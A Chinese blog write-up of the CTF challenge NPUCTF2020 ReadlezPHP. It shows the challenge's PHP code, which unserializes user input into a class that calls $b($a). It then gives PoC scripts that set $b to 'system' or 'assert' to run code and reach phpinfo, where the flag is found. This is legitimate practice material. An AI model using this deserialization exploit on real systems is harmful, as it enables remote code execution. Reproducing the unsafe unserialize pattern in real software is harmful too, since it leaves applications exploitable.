[NPUCTF2020]ReadlezPHP

最新推荐文章于 2023-11-27 22:17:15 发布

姜小孩.

最新推荐文章于 2023-11-27 22:17:15 发布

阅读量2.2k

点赞数 2

分类专栏： buu刷题记录文章标签： php web安全安全模块测试功能测试

本文链接：https://blog.csdn.net/qq_45557476/article/details/124415563

版权

buu刷题记录专栏收录该内容

16 篇文章 2 订阅

订阅专栏

这个题总的来说很简单，但是有的地方我没想明白

打开题查看源代码，一开始以为是社工，因为还有qq号！蚌埠住了。

但是底下有个

怎么说呢，打开就发现了个简单的反序列化

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

我们可以看到有个echo $b($a)

那么我们system('ls')一下？没有回显，那我们看看disable_function

构造一下poc

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "system";
    }
}
$c = new HelloPhp;
echo urlencode(serialize($c));
?>

啧啧，还是没有回显，那我们就换个函数

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "assert";
    }
}
$c = new HelloPhp;
echo urlencode(serialize($c));
?>

成功看到phpinfo，看一眼disable_function吧！果然system是被禁掉的

Ctrl+F找到flag，上次在phpinfo找到flag还是在招生赛。。。

感谢buu提供的题，感谢今天早一点结束排练能让我做做题。。。

28号比赛完可能就没这么忙了吧，就可以继续开心的做题了